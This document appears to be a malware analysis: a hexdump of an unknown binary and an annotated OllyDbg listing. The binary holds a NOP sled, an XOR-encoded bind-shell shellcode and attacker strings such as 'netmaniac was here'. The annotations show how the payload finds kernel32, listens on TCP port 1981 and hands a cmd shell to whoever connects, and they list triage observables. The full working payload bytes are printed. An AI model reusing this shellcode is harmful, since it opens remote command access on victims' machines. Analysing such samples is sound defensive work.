hexdump -C /tmp/unknown/b7980587c10cfa4e0fd22d589546140e.bin
00000000 10 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |.'..............|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
000000c0 00 00 00 00 00 00 00 00 00 00 00 00 00 90 90 90 |................|
000000d0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
00000200 90 90 90 90 fb 7b ab 71 eb 10 5a 4a 33 c9 66 b9 |....û{«që.ZJ3Éf¹|
00000210 66 01 80 34 0a 99 e2 fa eb 05 e8 eb ff ff ff 70 |f..4..âúë.èëÿÿÿp|
00000220 99 98 99 99 c3 21 95 69 64 e6 12 99 12 e9 85 34 |....Ã!.idæ...é.4|
00000230 12 d9 91 12 41 12 ea a5 9a 6a 12 ef e1 9a 6a 12 |.Ù..A.ê¥.j.ïá.j.|
00000240 e7 b9 9a 62 12 d7 8d aa 74 cf ce c8 12 a6 9a 62 |ç¹.b.×.ªtÏÎÈ.Š.b|
00000250 12 6b f3 97 c0 6a 3f ed 91 c0 c6 1a 5e 9d dc 7b |.kó.Àj?í.ÀÆ.^.Ü{|
00000260 70 c0 c6 c7 12 54 12 df bd 9a 5a 48 78 9a 58 aa |pÀÆÇ.T.ßœ.ZHx.Xª|
00000270 50 ff 12 91 12 df 85 9a 5a 58 78 9b 9a 58 12 99 |Pÿ...ß..ZXx..X..|
00000280 9a 5a 12 63 12 6e 1a 5f 97 12 49 f3 9a c0 71 e5 |.Z.c.n._..Ió.Àqå|
00000290 99 99 99 1a 5f 94 cb cf 66 ce 65 c3 12 41 f3 9d |...._.ËÏfÎeÃ.Aó.|
000002a0 c0 71 f0 99 99 99 c9 c9 c9 c9 f3 98 f3 9b 66 ce |Àqð...ÉÉÉÉó.ó.fÎ|
000002b0 69 12 41 5e 9e 9b 99 9e 24 aa 59 10 de 9d f3 89 |i.A^....$ªY.Þ.ó.|
000002c0 ce ca 66 ce 6d f3 98 ca 66 ce 61 c9 c9 ca 66 ce |ÎÊfÎmó.ÊfÎaÉÉÊfÎ|
000002d0 65 1a 75 dd 12 6d aa 42 f3 89 c0 10 85 17 7b 62 |e.uÝ.mªBó.À...{b|
000002e0 10 df a1 10 df a5 10 df d9 5e df b5 98 98 99 99 |.ß¡.ߥ.ßÙ^ßµ....|
000002f0 14 de 89 c9 cf ca ca ca f3 98 ca ca 5e de a5 fa |.Þ.ÉÏÊÊÊó.ÊÊ^Þ¥ú|
00000300 f4 fd 99 14 de a5 c9 ca 66 ce 7d c9 66 ce 71 aa |ôý..Þ¥ÉÊfÎ}ÉfÎqª|
00000310 59 35 1c 59 ec 60 c8 cb cf ca 66 4b c3 c0 32 7b |Y5.Yì`ÈËÏÊfKÃÀ2{|
00000320 77 aa 59 5a 71 62 67 66 66 de fc ed c9 eb f6 fa |wªYZqbgffÞüíÉëöú|
00000330 d8 fd fd eb fc ea ea 99 da eb fc f8 ed fc c9 eb |Øýýëüêê.ÚëüøíüÉë|
00000340 f6 fa fc ea ea d8 99 dc e1 f0 ed c9 eb f6 fa fc |öúüêêØ.ÜáðíÉëöúü|
00000350 ea ea 99 d5 f6 f8 fd d5 f0 fb eb f8 eb e0 d8 99 |êê.ÕöøýÕðûëøëàØ.|
00000360 ee ea ab c6 aa ab 99 ce ca d8 ca f6 fa f2 fc ed |îê«Æª«.ÎÊØÊöúòüí|
00000370 d8 99 fb f0 f7 fd 99 f5 f0 ea ed fc f7 99 f8 fa |Ø.ûð÷ý.õðêíü÷.øú|
00000380 fa fc e9 ed 99 00 00 00 00 00 00 00 00 00 00 00 |úüéí............|
00000390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000410 00 00 6e 65 54 6d 61 4e 69 61 63 00 00 00 00 00 |..neTmaNiac.....|
00000420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
000005d0 00 00 00 00 00 00 00 00 6e 65 74 6d 61 6e 69 61 |........netmania|
000005e0 63 20 77 61 73 20 68 65 72 65 00 00 00 00 00 00 |c was here......|
000005f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
000006d0 00 00 00 00 00 00 00 00 00 00 00 00 31 32 2f 31 |............12/1|
000006e0 32 2f 30 34 20 31 33 3a 31 33 3a 31 33 00 00 00 |2/04 13:13:13...|
000006f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000ae0 00 00 00 00 00 00 00 00 00 00 00 00 6e 65 74 6e |............netn|
00000af0 69 6e 6a 61 7a 5f 70 6c 61 63 65 00 00 00 00 00 |injaz_place.....|
00000b00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000bf0 31 33 31 2e 31 33 31 2e 31 33 31 2e 31 33 31 00 |131.131.131.131.|
00000c00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000ef0 00 00 00 00 00 00 00 00 00 00 00 00 33 2e 37 32 |............3.72|
00000f00 2e 30 2e 30 00 00 00 00 00 00 00 00 00 00 00 00 |.0.0............|
00000f10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000fd0 00 00 00 00 00 00 00 00 00 f0 fd 7f 00 00 00 00 |.........ðý.....|
00000fe0 c7 42 e6 77 f0 00 40 00 ac f1 f8 0b 00 00 e6 77 |ÇBæwð.@.¬ñø...æw|
00000ff0 0c fd f8 0b 55 1f f8 77 80 31 f8 77 ff ff ff ff |.ýø.U.øw.1øwÿÿÿÿ|
00001000 30 fa f8 0b 07 31 f8 77 00 00 40 00 e8 9e e6 77 |0úø..1øw..@.è.æw|
00001010 00 00 40 00 ca 9e e6 77 00 00 00 00 c7 42 e6 77 |..@.Ê.æw....ÇBæw|
00001020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
000013e0 00 00 00 00 00 00 00 00 |........|
000013e8
; OllyDbg listing (32-bit x86, Intel syntax), one instruction per line.
; The bytes at 00424A31 match file offset 0x208 of the hexdump
; (eb 10 5a 4a 33 c9 66 b9 66 01 ...). Everything from 00424A48 onward is
; shown here AFTER decoding; in the file those bytes are XORed with 0x99
; (e.g. offset 0x21f holds 70 = E9 xor 99).
;
; Visible behaviour, in order:
;   1. Self-decoding stub: XOR key 0x99 over 0x166 bytes (00424A48..00424BAD).
;   2. Locate kernel32 via the PEB loader list, find GetProcAddress by name.
;   3. Resolve further imports through a helper at 00424B38 (helper body is
;      NOT part of this listing, so its exact behaviour is inferred from the
;      [EDI-n] call slots used afterwards).
;   4. LoadLibraryA("ws2_32"), WSASocketA, bind to TCP port 1981 on
;      INADDR_ANY, listen, accept.
;   5. CreateProcessA("cmd") with stdin/stdout/stderr set to the accepted
;      socket, then ExitProcess.
; Observables for triage: XOR-0x99 decoder loop, inbound TCP listener on
; port 1981, and a cmd child whose standard handles are a socket.
; No WSAStartup call is visible; presumably the host process has already
; initialised Winsock - confirm against the target.

; --- decoder stub (JMP/CALL/POP get-PC + XOR loop) ---
00424A31 EB 10 JMP SHORT 722b3019.00424A43                ; go to the CALL that pushes the address of the encoded body
00424A33 5A POP EDX                                       ; EDX = 00424A48 (return address pushed by the CALL at 00424A43)
00424A34 4A DEC EDX                                       ; EDX = 00424A47, so [EDX+ECX] with ECX=1 hits the first encoded byte
00424A35 33C9 XOR ECX,ECX
00424A37 66:B9 6601 MOV CX,166                            ; byte count 0x166
00424A3B 80340A 99 XOR BYTE PTR DS:[EDX+ECX],99           ; decode one byte with key 0x99, walking from the end backwards
00424A3F ^E2 FA LOOPD SHORT 722b3019.00424A3B             ; repeat until ECX reaches 0
00424A41 EB 05 JMP SHORT 722b3019.00424A48                ; enter the now-decoded body
00424A43 E8 EBFFFFFF CALL 722b3019.00424A33               ; get-PC: pushes 00424A48 and jumps back to the POP

; --- decoded body ---
00424A48 E9 00010000 JMP 722b3019.00424B4D                ; target is outside the listing; hexdump offset 0x324 xor 99 = E8 FB FE FF FF, a CALL back to 00424A4D
00424A4D 5A POP EDX                                       ; EDX = 00424B52, the string table ("GetProcAddress", ... at hexdump offset 0x329 once decoded)

; Find kernel32 through the loader data instead of an import table.
00424A4E B8 0CF0FD7F MOV EAX,7FFDF00C                     ; hard-coded address; presumably PEB (7FFDF000) + 0C = PEB.Ldr - OS-version dependent
00424A53 8B00 MOV EAX,DWORD PTR DS:[EAX]                  ; EAX = loader data pointer
00424A55 8B70 1C MOV ESI,DWORD PTR DS:[EAX+1C]            ; first entry of the list at +1C (InInitializationOrderModuleList); the original note "GetProcAddress" does not describe this load
00424A58 AD LODS DWORD PTR DS:[ESI]                       ; EAX = next list entry
00424A59 8B40 08 MOV EAX,DWORD PTR DS:[EAX+8]             ; module base of that entry; debugger: KERNEL32.77E70000
00424A5C 8BD8 MOV EBX,EAX                                 ; EBX = kernel32 base for all RVA fix-ups below

; Walk the PE export directory of kernel32.
00424A5E 8B73 3C MOV ESI,DWORD PTR DS:[EBX+3C]            ; e_lfanew
00424A61 03F3 ADD ESI,EBX                                 ; ESI = PE header
00424A63 8B76 78 MOV ESI,DWORD PTR DS:[ESI+78]            ; export directory RVA; debugger: KERNEL32.77EC4220
00424A66 03F3 ADD ESI,EBX                                 ; ESI = export directory
00424A68 8B7E 20 MOV EDI,DWORD PTR DS:[ESI+20]            ; AddressOfNames RVA; debugger value as printed: KERNEL32.77E7C4F3C
00424A6B 03FB ADD EDI,EBX                                 ; EDI = name-pointer array
00424A6D 8B4E 14 MOV ECX,DWORD PTR DS:[ESI+14]            ; loop bound taken from +14 (NumberOfFunctions)
00424A70 33ED XOR EBP,EBP                                 ; EBP = index of the name being tested
00424A72 56 PUSH ESI                                      ; keep export directory across the loop

; Name search loop: compare each export name with the 14-byte string at EDX.
00424A73 57 PUSH EDI                                      ; save cursor into the name-pointer array
00424A74 51 PUSH ECX                                      ; save remaining count
00424A75 8B3F MOV EDI,DWORD PTR DS:[EDI]                  ; RVA of current name
00424A77 03FB ADD EDI,EBX                                 ; EDI = current export name
00424A79 8BF2 MOV ESI,EDX                                 ; ESI = "GetProcAddress"
00424A7B 6A 0E PUSH 0E
00424A7D 59 POP ECX                                       ; compare length 0x0E = 14 characters
00424A7E F3:A6 REPE CMPS BYTE PTR ES:[EDI],BYTE PTR DS:>  ; operand truncated by the debugger column
00424A80 74 08 JE SHORT 722b3019.00424A8A                 ; all 14 bytes equal: found
00424A82 59 POP ECX
00424A83 5F POP EDI
00424A84 83C7 04 ADD EDI,4                                ; next name pointer
00424A87 45 INC EBP
00424A88 ^E2 E9 LOOPD SHORT 722b3019.00424A73             ; function lookup loop

; Index -> ordinal -> function address.
00424A8A 59 POP ECX
00424A8B 5F POP EDI
00424A8C 5E POP ESI                                       ; ESI = export directory again
00424A8D 8BCD MOV ECX,EBP                                 ; matched name index
00424A8F 8B46 24 MOV EAX,DWORD PTR DS:[ESI+24]            ; AddressOfNameOrdinals RVA
00424A92 03C3 ADD EAX,EBX
00424A94 D1E1 SHL ECX,1                                   ; ordinals are 2 bytes each
00424A96 03C1 ADD EAX,ECX
00424A98 33C9 XOR ECX,ECX
00424A9A 66:8B08 MOV CX,WORD PTR DS:[EAX]                 ; ECX = ordinal for the matched name
00424A9D 8B46 1C MOV EAX,DWORD PTR DS:[ESI+1C]            ; AddressOfFunctions RVA
00424AA0 03C3 ADD EAX,EBX
00424AA2 C1E1 02 SHL ECX,2                                ; function RVAs are 4 bytes each
00424AA5 03C1 ADD EAX,ECX
00424AA7 8B00 MOV EAX,DWORD PTR DS:[EAX]
00424AA9 03C3 ADD EAX,EBX                                 ; EAX = address of GetProcAddress

; Resolve three more kernel32 names through the helper.
00424AAB 8BFA MOV EDI,EDX                                 ; EDI = string table base; later calls go through [EDI-n]
00424AAD 8BF7 MOV ESI,EDI
00424AAF 83C6 0E ADD ESI,0E                               ; ESI = terminator of "GetProcAddress" (name cursor for the helper)
00424AB2 8BD0 MOV EDX,EAX                                 ; EDX = GetProcAddress
00424AB4 6A 03 PUSH 3
00424AB6 59 POP ECX                                       ; ECX = 3 names to resolve
00424AB7 E8 7C000000 CALL 722b3019.00424B38               ; helper not shown; presumably calls GetProcAddress per name and stores the pointers via EDI (the slots used below fit that)
00424ABC 83C6 0D ADD ESI,0D                               ; presumably skips "LoadLibraryA" + NUL so ESI points at "ws2_32" - depends on the unseen helper
00424ABF 52 PUSH EDX                                      ; preserve GetProcAddress across the API call
00424AC0 56 PUSH ESI
00424AC1 FF57 FC CALL DWORD PTR DS:[EDI-4]                ; call LoadLibraryA ws2_32
00424AC4 5A POP EDX
00424AC5 8BD8 MOV EBX,EAX                                 ; EBX = module handle returned by LoadLibraryA

; Resolve four Winsock names, then build the listener.
00424AC7 6A 04 PUSH 4
00424AC9 59 POP ECX                                       ; ECX = 4 names to resolve
00424ACA E8 69000000 CALL 722b3019.00424B38               ; same helper, now against ws2_32
00424ACF 50 PUSH EAX                                      ; four trailing arguments take whatever EAX the helper left (not verifiable here)
00424AD0 50 PUSH EAX
00424AD1 50 PUSH EAX
00424AD2 50 PUSH EAX
00424AD3 6A 01 PUSH 1                                     ; type = 1 (SOCK_STREAM)
00424AD5 6A 02 PUSH 2                                     ; af = 2 (AF_INET)
00424AD7 FF57 F0 CALL DWORD PTR DS:[EDI-10]               ; call WSASocketA
00424ADA 8BD8 MOV EBX,EAX                                 ; EBX = listening socket
00424ADC C707 020007BD MOV DWORD PTR DS:[EDI],BD070002    ; sockaddr_in: family 0002, port bytes 07 BD = 0x07BD = 1981 in network order
00424AE2 33C0 XOR EAX,EAX
00424AE4 8947 04 MOV DWORD PTR DS:[EDI+4],EAX             ; address = 0.0.0.0: listens on every interface
00424AE7 6A 10 PUSH 10                                    ; namelen = 16
00424AE9 57 PUSH EDI
00424AEA 53 PUSH EBX
00424AEB FF57 F4 CALL DWORD PTR DS:[EDI-C]                ; call bind
00424AEE 6A 01 PUSH 1                                     ; backlog = 1
00424AF0 53 PUSH EBX
00424AF1 FF57 F8 CALL DWORD PTR DS:[EDI-8]                ; call listen
00424AF4 50 PUSH EAX                                      ; addrlen/addr = return value of listen (0 on success); no return value is checked anywhere
00424AF5 50 PUSH EAX
00424AF6 53 PUSH EBX
00424AF7 FF57 FC CALL DWORD PTR DS:[EDI-4]                ; call accept

; Build a 0x44-byte structure on the stack (size of STARTUPINFOA) and start cmd.
00424AFA 83EC 44 SUB ESP,44
00424AFD 8BF4 MOV ESI,ESP                                 ; ESI = structure base
00424AFF 33DB XOR EBX,EBX                                 ; EBX = 0 from here on (listening socket handle is dropped)
00424B01 6A 10 PUSH 10
00424B03 59 POP ECX
00424B04 891C8E MOV DWORD PTR DS:[ESI+ECX*4],EBX          ; zero dwords at +40 down to +04; offset +00 is never written
00424B07 ^E2 FB LOOPD SHORT 722b3019.00424B04
00424B09 8946 38 MOV DWORD PTR DS:[ESI+38],EAX            ; hStdInput  = accepted socket (EAX still holds accept's result)
00424B0C 8946 3C MOV DWORD PTR DS:[ESI+3C],EAX            ; hStdOutput = accepted socket
00424B0F 8946 40 MOV DWORD PTR DS:[ESI+40],EAX            ; hStdError  = accepted socket
00424B12 C746 2C 01010000 MOV DWORD PTR DS:[ESI+2C],101   ; dwFlags = 0x100 | 0x1 (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW); wShowWindow stays 0
00424B19 8D47 10 LEA EAX,DWORD PTR DS:[EDI+10]
00424B1C 50 PUSH EAX                                      ; lpProcessInformation = scratch at EDI+10
00424B1D 56 PUSH ESI                                      ; lpStartupInfo
00424B1E 53 PUSH EBX                                      ; lpCurrentDirectory = NULL
00424B1F 53 PUSH EBX                                      ; lpEnvironment = NULL
00424B20 53 PUSH EBX                                      ; dwCreationFlags = 0
00424B21 6A 01 PUSH 1                                     ; bInheritHandles = TRUE, so the child inherits the socket
00424B23 53 PUSH EBX                                      ; lpThreadAttributes = NULL
00424B24 53 PUSH EBX                                      ; lpProcessAttributes = NULL
00424B25 C747 3C 636D6400 MOV DWORD PTR DS:[EDI+3C],646D63 ; writes the bytes 63 6D 64 00 = "cmd\0"
00424B2C 8D47 3C LEA EAX,DWORD PTR DS:[EDI+3C]
00424B2F 50 PUSH EAX                                      ; lpCommandLine = "cmd"
00424B30 53 PUSH EBX                                      ; lpApplicationName = NULL
00424B31 FF57 E4 CALL DWORD PTR DS:[EDI-1C]               ; call CreateProcessA
00424B34 50 PUSH EAX                                      ; exit code = CreateProcessA's return value
00424B35 FF57 E8 CALL DWORD PTR DS:[EDI-18]               ; call ExitProcess